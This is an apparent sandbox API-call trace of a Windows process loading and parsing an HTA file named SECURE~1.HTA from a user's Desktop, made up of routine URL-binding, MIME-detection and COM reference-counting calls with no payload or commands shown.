[0037.529] IUnknown:AddRef (This=0x7ffb238c93c8) returned 0x1
[0037.529] StrCmpICW (pszStr1="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA", pszStr2="res://ieframe.dll/PhishSite.htm") returned -12
[0037.530] StrCmpICW (pszStr1="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA", pszStr2="res://ieframe.dll/BlockSite.htm") returned -12
[0037.530] LoadLibraryExW (lpLibFileName="urlmon.dll", hFile=0x0, dwFlags=0x0) returned 0x7ffb2ea50000
[0037.531] GetProcAddress (hModule=0x7ffb2ea50000, lpProcName=0x1d7) returned 0x7ffb2eaa9f00
[0037.531] IUnknown:QueryInterface (in: This=0xb8a8c30650, riid=0x7ffb234680e0*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0xb8a8a2ed40 | out: ppvObject=0xb8a8a2ed40*=0xb8a8c30650) returned 0x0
[0037.531] IUnknown:Release (This=0xb8a8c30650) returned 0xa
[0037.531] IUnknown:AddRef (This=0xb8a8c30650) returned 0xb
[0037.531] IUnknown:AddRef (This=0xb8a8c30650) returned 0xc
[0037.531] IUri:GetSchemeName (in: This=0xb8a8c30650, pbstrSchemeName=0xb8a8a2ed00 | out: pbstrSchemeName=0xb8a8a2ed00*="file") returned 0x0
[0037.531] IUnknown:QueryInterface (in: This=0xb8a8c30650, riid=0x7ffb234680e0*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0xb8a8a2ecb0 | out: ppvObject=0xb8a8a2ecb0*=0xb8a8c30650) returned 0x0
[0037.531] IUnknown:Release (This=0xb8a8c30650) returned 0xc
[0037.532] IUnknown:AddRef (This=0xb8a8c30650) returned 0xd
[0037.532] IUnknown:Release (This=0xb8a8c30650) returned 0xc
[0037.532] IUri:GetScheme (in: This=0xb8a8c30650, pdwScheme=0xb8a8a2ee50 | out: pdwScheme=0xb8a8a2ee50*=0x9) returned 0x0
[0037.532] IUri:IsEqual (in: This=0xb8a8c431a0, pUri=0xb8a8c30650, pfEqual=0xb8a8a2ef10 | out: pfEqual=0xb8a8a2ef10*=1) returned 0x0
[0037.533] PostMessageW (hWnd=0x50210, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1
[0037.533] IUnknown:AddRef (This=0xb8a8c307c0) returned 0x3
[0037.534] IUnknown:AddRef (This=0xb8a8c30650) returned 0xd
[0037.534] IUnknown:QueryInterface (in: This=0xb8a8c30650, riid=0x7ffb234680e0*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0xb8a8a2ed60 | out: ppvObject=0xb8a8a2ed60*=0xb8a8c30650) returned 0x0
[0037.534] IUnknown:Release (This=0xb8a8c30650) returned 0xd
[0037.534] IUnknown:AddRef (This=0xb8a8c30650) returned 0xe
[0037.534] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0xb8a8a2e900, dwReserved=0x0 | out: ppSM=0xb8a8a2e900*=0xb8a8c385e0) returned 0x0
[0037.534] IUnknown:QueryInterface (in: This=0xb8a8c385e0, riid=0x7ffb233e61d8*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0xb8a8a2e8f8 | out: ppvObject=0xb8a8a2e8f8*=0xb8a8c385e0) returned 0x0
[0037.535] IInternetSecurityManager:SetSecuritySite (This=0xb8a8c385e0, pSite=0xb8a8c48b08) returned 0x0
[0037.542] IUnknown:AddRef (This=0xb8a8c385e0) returned 0x3
[0037.542] IUnknown:Release (This=0xb8a8c385e0) returned 0x2
[0037.542] IUnknown:Release (This=0xb8a8c385e0) returned 0x1
[0037.542] IUnknown:QueryInterface (in: This=0xb8a8c30650, riid=0x7ffb234680e0*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0xb8a8a2e8a0 | out: ppvObject=0xb8a8a2e8a0*=0xb8a8c30650) returned 0x0
[0037.542] IUnknown:Release (This=0xb8a8c30650) returned 0xe
[0037.542] IUnknown:AddRef (This=0xb8a8c30650) returned 0xf
[0037.542] QueryPerformanceCounter (in: lpPerformanceCount=0xb8a8a2e878 | out: lpPerformanceCount=0xb8a8a2e878*=402260391) returned 1
[0037.542] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xb8a8a2e870 | out: lpSystemTimeAsFileTime=0xb8a8a2e870*(dwLowDateTime=0xe603b742, dwHighDateTime=0x1d3a68a))
[0037.542] QueryPerformanceCounter (in: lpPerformanceCount=0xb8a8a2e8f0 | out: lpPerformanceCount=0xb8a8a2e8f0*=402260597) returned 1
[0037.542] IUnknown:AddRef (This=0xb8a8c30650) returned 0x10
[0037.542] IUnknown:AddRef (This=0xb8a8c30650) returned 0x11
[0037.542] IUnknown:AddRef (This=0xb8a8c30650) returned 0x12
[0037.542] IUnknown:QueryInterface (in: This=0xb8a8c30650, riid=0x7ffb234680e0*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0xb8a8a2e870 | out: ppvObject=0xb8a8a2e870*=0xb8a8c30650) returned 0x0
[0037.542] IUnknown:Release (This=0xb8a8c30650) returned 0x12
[0037.542] IUnknown:AddRef (This=0xb8a8c30650) returned 0x13
[0037.542] IUri:GetScheme (in: This=0xb8a8c30650, pdwScheme=0xc0aab40ee0 | out: pdwScheme=0xc0aab40ee0*=0x9) returned 0x0
[0037.542] IMoniker:IsSystemMoniker (in: This=0xb8a8c15f50, pdwMksys=0xb8a8a2e968 | out: pdwMksys=0xb8a8a2e968*=0x6) returned 0x0
[0037.542] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0037.543] GetProcAddress (hModule=0x7ffb2ea50000, lpProcName="CoInternetParseIUri") returned 0x7ffb2eaab3c0
[0037.543] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2e780 | out: lpflOldProtect=0xb8a8a2e780*=0x4) returned 1
[0037.543] CoInternetParseIUri (in: pIUri=0xb8a8c30650, ParseAction=0x9, dwFlags=0x0, pwzResult=0xb8a8a2ea00, cchResult=0x104, pcchResult=0xb8a8a2e958, dwReserved=0x0 | out: pwzResult="C:\\Users\\CIIHMN~1\\Desktop\\SECURE~1.HTA", pcchResult=0xb8a8a2e958) returned 0x0
[0037.543] FindFirstFileW (in: lpFileName="C:\\Users\\CIIHMN~1\\Desktop\\SECURE~1.HTA", lpFindFileData=0xb8a8a2e680 | out: lpFindFileData=0xb8a8a2e680) returned 0xb8a8c2ee70
[0037.543] FindClose (in: hFindFile=0xb8a8c2ee70 | out: hFindFile=0xb8a8c2ee70) returned 1
[0037.543] IUnknown:QueryInterface (in: This=0xb8a8c30650, riid=0x7ffb234680e0*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0xb8a8a2e8a0 | out: ppvObject=0xb8a8a2e8a0*=0xb8a8c30650) returned 0x0
[0037.543] IUnknown:Release (This=0xb8a8c30650) returned 0x13
[0037.543] IUnknown:AddRef (This=0xb8a8c30650) returned 0x14
[0037.543] IInternetSession:CreateBinding (in: This=0xb8a8c307c0, pbc=0x0, szUrl="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA", pUnkOuter=0x0, ppunk=0x0, ppOInetProt=0xb8a8a2e7d0, dwOption=0x0 | out: ppunk=0x0, ppOInetProt=0xb8a8a2e7d0*=0xb8a8c49970) returned 0x0
[0037.544] IUnknown:QueryInterface (in: This=0xb8a8c49970, riid=0x7ffb234f5b88*(Data1=0x53c84785, Data2=0x8425, Data3=0x4dc5, Data4=([0]=0x97, [1]=0x1b, [2]=0xe5, [3]=0x8d, [4]=0x9c, [5]=0x19, [6]=0xf9, [7]=0xb6)), ppvObject=0xb8a8a2e760 | out: ppvObject=0xb8a8a2e760*=0x0) returned 0x80004002
[0037.544] IUnknown:QueryInterface (in: This=0xb8a8c49970, riid=0x7ffb234f5b78*(Data1=0xeb5cda44, Data2=0x5086, Data3=0x44fe, Data4=([0]=0xa9, [1]=0xb1, [2]=0xc6, [3]=0x42, [4]=0x13, [5]=0x53, [6]=0xa5, [7]=0x46)), ppvObject=0xb8a8a2e758 | out: ppvObject=0xb8a8a2e758*=0xb8a8c49998) returned 0x0
[0037.546] IInternetSession:GetSessionOption (in: This=0xb8a8c49998, dwOption=0x1, pBuffer=0x1, pdwBufferLength=0x2, dwReserved=0x1 | out: pBuffer=0x1, pdwBufferLength=0x2) returned 0x80004001
[0037.546] IUnknown:Release (This=0xb8a8c49998) returned 0x1
[0037.546] IUnknown:AddRef (This=0xb8a8c49970) returned 0x2
[0037.549] IUnknown:AddRef (This=0xb8a8c385e0) returned 0x2
[0037.550] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0037.550] GetProcAddress (hModule=0x7ffb3a570000, lpProcName="SHStrDupW") returned 0x7ffb3a59cb70
[0037.550] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2e540 | out: lpflOldProtect=0xb8a8a2e540*=0x4) returned 1
[0037.550] SHStrDupW (in: psz="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA", ppwsz=0xb8a8c47988 | out: ppwsz=0xb8a8c47988*="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA") returned 0x0
[0037.557] IUnknown:QueryInterface (in: This=0xb8a8c49970, riid=0x7ffb233e9d40*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0xb8a8c479a8 | out: ppvObject=0xb8a8c479a8*=0xb8a8c49970) returned 0x0
[0037.557] IUnknown:QueryInterface (in: This=0xb8a8c49970, riid=0x7ffb234c93c8*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0xb8a8c47968 | out: ppvObject=0xb8a8c47968*=0x0) returned 0x80004002
[0037.557] IUnknown:Release (This=0xb8a8c49970) returned 0x2
[0037.558] IInternetProtocolRoot:Start (This=0xb8a8c49970, szUrl="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA", pOIProtSink=0xb8a8c47998, pOIBindInfo=0xb8a8c47918, grfPI=0x10, dwReserved=0x0) returned 0x0
[0037.558] IUnknown:QueryInterface (in: This=0xb8a8c47998, riid=0x7ffb2eb492a0*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0xb8a8a2e850 | out: ppvObject=0xb8a8a2e850*=0x0) returned 0x80004002
[0037.558] IUnknown:AddRef (This=0xb8a8c47998) returned 0x5
[0037.558] IUnknown:AddRef (This=0xb8a8c47918) returned 0x6
[0037.558] IUnknown:QueryInterface (in: This=0xb8a8c47918, riid=0x7ffb2eb47db8*(Data1=0xa3e015b7, Data2=0xa82c, Data3=0x4dcd, Data4=([0]=0xa1, [1]=0x50, [2]=0x56, [3]=0x9a, [4]=0xee, [5]=0xed, [6]=0x36, [7]=0xab)), ppvObject=0xb8a8a2e770 | out: ppvObject=0xb8a8a2e770*=0xb8a8c47918) returned 0x0
[0037.559] IInternetBindInfoEx:GetBindInfoEx (in: This=0xb8a8c47918, grfBINDF=0xb8a8c49c50, pbindinfo=0xb8a8c49c58, grfBINDF2=0xb8a8c49c54, pdwReserved=0xb8a8a2e768 | out: grfBINDF=0xb8a8c49c50*=0x20483, pbindinfo=0xb8a8c49c58, grfBINDF2=0xb8a8c49c54*=0x20704000, pdwReserved=0xb8a8a2e768*=0x0) returned 0x0
[0037.559] IUnknown:Release (This=0xb8a8c47918) returned 0x6
[0037.559] IUnknown:AddRef (This=0xb8a8c47998) returned 0x7
[0037.559] IInternetProtocolSink:ReportProgress (This=0xb8a8c47998, ulStatusCode=0x1e, szStatusText=0x0) returned 0x0
[0037.559] IUnknown:Release (This=0xb8a8c47998) returned 0x6
[0037.559] IUnknown:AddRef (This=0xb8a8c47998) returned 0x7
[0037.559] IInternetProtocolSink:ReportProgress (This=0xb8a8c47998, ulStatusCode=0xb, szStatusText="") returned 0x0
[0037.559] QueryPerformanceCounter (in: lpPerformanceCount=0xb8a8a2df30 | out: lpPerformanceCount=0xb8a8a2df30*=402320154) returned 1
[0037.559] IUnknown:Release (This=0xb8a8c47998) returned 0x6
[0037.559] IUnknown:AddRef (This=0xb8a8c47998) returned 0x7
[0037.559] IInternetProtocolSink:ReportProgress (This=0xb8a8c47998, ulStatusCode=0x40, szStatusText="703") returned 0x0
[0037.559] _wtoi64 (_String="703") returned 703
[0037.559] IUnknown:Release (This=0xb8a8c47998) returned 0x6
[0037.560] IUnknown:AddRef (This=0xb8a8c47998) returned 0x7
[0037.560] IInternetProtocolSink:ReportProgress (This=0xb8a8c47998, ulStatusCode=0xe, szStatusText="C:\\Users\\CIIHMN~1\\Desktop\\SECURE~1.HTA") returned 0x0
[0037.560] GetCurrentProcessId () returned 0x700
[0037.560] IUnknown:Release (This=0xb8a8c47998) returned 0x6
[0037.563] IUnknown:AddRef (This=0xb8a8c47998) returned 0x7
[0037.563] IInternetProtocolSink:ReportProgress (This=0xb8a8c47998, ulStatusCode=0xd, szStatusText="application/hta") returned 0x0
[0037.563] RegisterClipboardFormatW (lpszFormat="text/html") returned 0xc0e4
[0037.563] RegisterClipboardFormatW (lpszFormat="text/plain") returned 0xc0e5
[0037.565] RegisterClipboardFormatW (lpszFormat="text/xml") returned 0xc109
[0037.565] RegisterClipboardFormatW (lpszFormat="application/xml") returned 0xc10a
[0037.565] RegisterClipboardFormatW (lpszFormat="application/xhtml+xml") returned 0xc10b
[0037.565] RegisterClipboardFormatW (lpszFormat="text/x-component") returned 0xc17d
[0037.566] RegisterClipboardFormatW (lpszFormat="image/svg+xml") returned 0xc10c
[0037.566] RegisterClipboardFormatW (lpszFormat="video/avi") returned 0xc0fc
[0037.567] RegisterClipboardFormatW (lpszFormat="video/x-msvideo") returned 0xc0fd
[0037.567] RegisterClipboardFormatW (lpszFormat="video/mpeg") returned 0xc0fe
[0037.567] RegisterClipboardFormatW (lpszFormat="video/quicktime") returned 0xc177
[0037.567] RegisterClipboardFormatW (lpszFormat="application/hta") returned 0xc178
[0037.567] RegisterClipboardFormatW (lpszFormat="text/cache-manifest") returned 0xc0e2
[0037.567] RegisterClipboardFormatW (lpszFormat="text/vtt") returned 0xc175
[0037.567] RegisterClipboardFormatW (lpszFormat="application/ttml+xml") returned 0xc173
[0037.567] RegisterClipboardFormatW (lpszFormat="application/ttaf+xml") returned 0xc174
[0037.567] RegisterClipboardFormatW (lpszFormat="text/json") returned 0xc172
[0037.567] RegisterClipboardFormatW (lpszFormat="application/x-javascript") returned 0xc171
[0037.567] RegisterClipboardFormatW (lpszFormat="image/x-png") returned 0xc0f3
[0037.567] RegisterClipboardFormatW (lpszFormat="image/png") returned 0xc0f4
[0037.567] RegisterClipboardFormatW (lpszFormat="image/jpeg") returned 0xc0f1
[0037.567] RegisterClipboardFormatW (lpszFormat="image/pjpeg") returned 0xc0f0
[0037.567] RegisterClipboardFormatW (lpszFormat="image/gif") returned 0xc0ef
[0037.567] RegisterClipboardFormatW (lpszFormat="image/vnd.ms-dds") returned 0xc170
[0037.567] RegisterClipboardFormatW (lpszFormat="image/svg+xml") returned 0xc10c
[0037.567] RegisterClipboardFormatW (lpszFormat="image/tiff") returned 0xc0f2
[0037.567] RegisterClipboardFormatW (lpszFormat="image/bmp") returned 0xc0f5
[0037.567] RegisterClipboardFormatW (lpszFormat="image/vnd.ms-photo") returned 0xc0fa
[0037.567] RegisterClipboardFormatW (lpszFormat="image/x-wmf") returned 0xc0f8
[0037.567] RegisterClipboardFormatW (lpszFormat="image/x-emf") returned 0xc0f7
[0037.567] RegisterClipboardFormatW (lpszFormat="image/x-icon") returned 0xc0f9
[0037.569] QueryPerformanceCounter (in: lpPerformanceCount=0xb8a8a2ddb0 | out: lpPerformanceCount=0xb8a8a2ddb0*=402355304) returned 1
[0037.569] QueryPerformanceCounter (in: lpPerformanceCount=0xb8a8a2dd70 | out: lpPerformanceCount=0xb8a8a2dd70*=402355439) returned 1
[0037.569] StrChrW (lpStart="application/hta", wMatch=0x3b) returned 0x0
[0037.569] StrCmpNICW (lpStr1="text/", lpStr2="appli", nChar=5) returned 19
[0037.569] StrCmpNICW (lpStr1="application/", lpStr2="application/", nChar=12) returned 0
[0037.569] IUnknown:Release (This=0xb8a8c47998) returned 0x6
[0037.569] IUnknown:AddRef (This=0xb8a8c47998) returned 0x7
[0037.569] IUnknown:AddRef (This=0xb8a8c47998) returned 0x8
[0037.569] IInternetProtocolSink:ReportData (This=0xb8a8c47998, grfBSCF=0x5, ulProgress=0x2bf, ulProgressMax=0x2bf) returned 0x0
[0037.569] IUnknown:QueryInterface (in: This=0xb8a8c49970, riid=0x7ffb234cb370*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0xb8a8a2c2b8 | out: ppvObject=0xb8a8a2c2b8*=0x0) returned 0x80004002
[0037.569] IUnknown:QueryInterface (in: This=0xb8a8c49970, riid=0x7ffb233f7ea8*(Data1=0x79eac9d6, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0xb8a8a2c2c0 | out: ppvObject=0xb8a8a2c2c0*=0x0) returned 0x80004002
[0037.570] IUnknown:Release (This=0xb8a8c47998) returned 0x7
[0037.570] IUnknown:AddRef (This=0xb8a8c47998) returned 0x8
[0037.570] IInternetProtocolSink:ReportResult (This=0xb8a8c47998, hrResult=0x0, dwError=0x0, szResult=0x0) returned 0x0
[0037.570] IUnknown:Release (This=0xb8a8c47998) returned 0x7
[0037.570] IUnknown:Release (This=0xb8a8c47998) returned 0x6
[0037.570] IUnknown:Release (This=0xb8a8c30650) returned 0x13
[0037.570] IUnknown:Release (This=0xb8a8c385e0) returned 0x1
[0037.570] IUnknown:Release (This=0xb8a8c30650) returned 0x12
[0037.570] IUnknown:Release (This=0xb8a8c30650) returned 0x11
[0037.570] CoTaskMemFree (pv=0x0)
[0037.570] GetCurrentThreadId () returned 0x210
[0037.570] GetCurrentProcessId () returned 0x700
[0037.570] GetCurrentThreadId () returned 0x210
[0037.570] memcpy_s (in: _Destination=0xb8a8a2eda8, _DestinationSize=0xc, _Source=0xc0aab40d98, _SourceSize=0xc | out: _Destination=0xb8a8a2eda8) returned 0x0
[0037.570] MulDiv (nNumber=703, nNumerator=4000, nDenominator=703) returned 4000
[0037.571] IUnknown:QueryInterface (in: This=0xb8a8c49970, riid=0x7ffb233e9d40*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0xb8a8a2e9f0 | out: ppvObject=0xb8a8a2e9f0*=0xb8a8c49970) returned 0x0
[0037.571] IInternetProtocol:Read (in: This=0xb8a8c49970, pv=0xb8a8c47f1c, cb=0xc8, pcbRead=0xb8a8a2eb90 | out: pv=0xb8a8c47f1c, pcbRead=0xb8a8a2eb90*=0xc8) returned 0x0
[0037.571] IUnknown:Release (This=0xb8a8c49970) returned 0x2
[0037.571] memcpy_s (in: _Destination=0xb8a8a2ec70, _DestinationSize=0xc8, _Source=0xb8a8c47f1c, _SourceSize=0xc8 | out: _Destination=0xb8a8a2ec70) returned 0x0
[0037.571] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0037.571] GetProcAddress (hModule=0x7ffb2ea50000, lpProcName="CoInternetIsFeatureEnabledForUrl") returned 0x7ffb2ea87ed0
[0037.571] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2ea20 | out: lpflOldProtect=0xb8a8a2ea20*=0x4) returned 1
[0037.572] CoInternetIsFeatureEnabledForUrl (FeatureEntry=0x3, dwFlags=0x2, szURL="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA", pSecMgr=0x0) returned 0x1
[0037.572] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0037.572] GetProcAddress (hModule=0x7ffb2ea50000, lpProcName="ReleaseBindInfo") returned 0x7ffb2eaab310
[0037.572] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2ea20 | out: lpflOldProtect=0xb8a8a2ea20*=0x4) returned 1
[0037.572] ReleaseBindInfo (pbindinfo=0xb8a8a2ebf0)
[0037.573] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0037.573] GetProcAddress (hModule=0x7ffb2ea50000, lpProcName="FindMimeFromData") returned 0x7ffb2ea89ec0
[0037.573] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2e9c0 | out: lpflOldProtect=0xb8a8a2e9c0*=0x4) returned 1
[0037.573] FindMimeFromData (in: pBC=0x0, pwzUrl="C:\\Users\\CIIHMN~1\\Desktop\\SECURE~1.HTA", pBuffer=0xb8a8a2ec70, cbSize=0xc8, pwzMimeProposed="application/hta", dwMimeFlags=0x6, ppwzMimeOut=0xb8a8a2eb78, dwReserved=0x0 | out: ppwzMimeOut=0xb8a8a2eb78*="application/hta") returned 0x0
[0037.574] CoTaskMemFree (pv=0xb8a8c48d70)
[0037.574] CoInternetIsFeatureEnabledForUrl (FeatureEntry=0x3, dwFlags=0x2, szURL="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA", pSecMgr=0x0) returned 0x1
[0037.574] StrCmpNIW (lpStr1="applic", lpStr2="image/", nChar=6) returned -1
[0037.576] GetCurrentThreadId () returned 0x210
[0037.576] GetCurrentThreadId () returned 0x210
[0037.576] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0xb8a8a2e970 | out: lpCPInfo=0xb8a8a2e970) returned 1
[0037.576] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="application/hta", cchCount1=7, lpString2="charset", cchCount2=7) returned 1
[0037.576] memcpy_s (in: _Destination=0xb8a8c49ff0, _DestinationSize=0x1000, _Source=0xb8a8c47f1c, _SourceSize=0xc8 | out: _Destination=0xb8a8c49ff0) returned 0x0
[0037.576] IUnknown:QueryInterface (in: This=0xb8a8c49970, riid=0x7ffb233e9d40*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0xb8a8a2e790 | out: ppvObject=0xb8a8a2e790*=0xb8a8c49970) returned 0x0
[0037.576] IInternetProtocol:Read (in: This=0xb8a8c49970, pv=0xb8a8c4b0d4, cb=0xf38, pcbRead=0xb8a8a2e930 | out: pv=0xb8a8c4b0d4, pcbRead=0xb8a8a2e930*=0x1f7) returned 0x1
[0037.578] IUnknown:Release (This=0xb8a8c49970) returned 0x2
[0037.578] memcpy_s (in: _Destination=0xb8a8c4a0b8, _DestinationSize=0xf38, _Source=0xb8a8c4b0d4, _SourceSize=0x1f7 | out: _Destination=0xb8a8c4a0b8) returned 0x0
[0037.580] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xb8a8c49ff0, cbMultiByte=703, lpWideCharStr=0xb8a8c4f010, cchWideChar=703 | out: lpWideCharStr="\n\n\n\n") returned 703
[0037.580] GetCurrentThreadId () returned 0x210
[0037.581] GetCurrentThreadId () returned 0x210
[0037.581] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0037.581] GetProcAddress (hModule=0x7ffb2ea50000, lpProcName=0x1be) returned 0x7ffb2ea9b950
[0037.581] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2e800 | out: lpflOldProtect=0xb8a8a2e800*=0x4) returned 1
[0037.581] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0xb8a8a2e7f0 | out: lpCPInfo=0xb8a8a2e7f0) returned 1
[0037.581] IUnknown:AddRef (This=0xb8a8c307c0) returned 0x4
[0037.581] IUnknown:AddRef (This=0xb8a8c30650) returned 0x12
[0037.581] IUnknown:QueryInterface (in: This=0xb8a8c30650, riid=0x7ffb234680e0*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0xb8a8a2e7d0 | out: ppvObject=0xb8a8a2e7d0*=0xb8a8c30650) returned 0x0
[0037.582] IUnknown:Release (This=0xb8a8c30650) returned 0x12
[0037.582] IUnknown:AddRef (This=0xb8a8c30650) returned 0x13
[0037.582] IUri:GetScheme (in: This=0xb8a8c30650, pdwScheme=0xb8a8a2e8e0 | out: pdwScheme=0xb8a8a2e8e0*=0x9) returned 0x0
[0037.582] IUri:GetScheme (in: This=0xb8a8c30650, pdwScheme=0xb8a8a2e850 | out: pdwScheme=0xb8a8a2e850*=0x9) returned 0x0
[0037.582] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="application/hta", cchCount1=7, lpString2="charset", cchCount2=7) returned 1
[0037.582] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x15c
[0037.582] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x158
[0037.582] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7ffb22474320, lpParameter=0xc0aaaf8330, dwCreationFlags=0x0, lpThreadId=0xc0aaaf8350 | out: lpThreadId=0xc0aaaf8350*=0xcc0) returned 0x288
[0037.583] GetCurrentThreadId () returned 0x210
[0037.583] SetEvent (hEvent=0x15c) returned 1
[0037.583] GetCurrentThreadId () returned 0x210
[0037.583] IUnknown:Release (This=0xb8a8c30650) returned 0x12
[0037.583] IUnknown:Release (This=0xb8a8c43640) returned 0x2
[0037.583] IUnknown:Release (This=0xb8a8c15f50) returned 0x3
[0037.583] IUnknown:Release (This=0xb8a8c30650) returned 0x11
[0037.583] IUnknown:Release (This=0xb8a8c30650) returned 0x10
[0037.583] IUnknown:Release (This=0xb8a8c30650) returned 0xf
[0037.583] IUnknown:Release (This=0xb8a8c15f50) returned 0x2
[0037.583] IUnknown:Release (This=0xb8a8c30650) returned 0xe
[0037.583] CoTaskMemFree (pv=0xb8a8c3bde0)
[0037.583] CoTaskMemFree (pv=0x0)
[0037.583] IUnknown:Release (This=0xb8a8c30650) returned 0xd
[0037.583] CoTaskMemFree (pv=0xb8a8c3bd70)
[0037.583] GetClientRect (in: hWnd=0x50226, lpRect=0xb8a8a2fb30 | out: lpRect=0xb8a8a2fb30) returned 1
[0037.583] GetClientRect (in: hWnd=0x50226, lpRect=0xc0aab040f0 | out: lpRect=0xc0aab040f0) returned 1
[0037.590] OffsetRect (in: lprc=0xc0aab040f0, dx=0, dy=0 | out: lprc=0xc0aab040f0) returned 1
[0037.590] OffsetRect (in: lprc=0xc0aab04100, dx=0, dy=0 | out: lprc=0xc0aab04100) returned 1
[0037.590] RegisterClassExW (param_1=0xb8a8a2f540) returned 0xc126
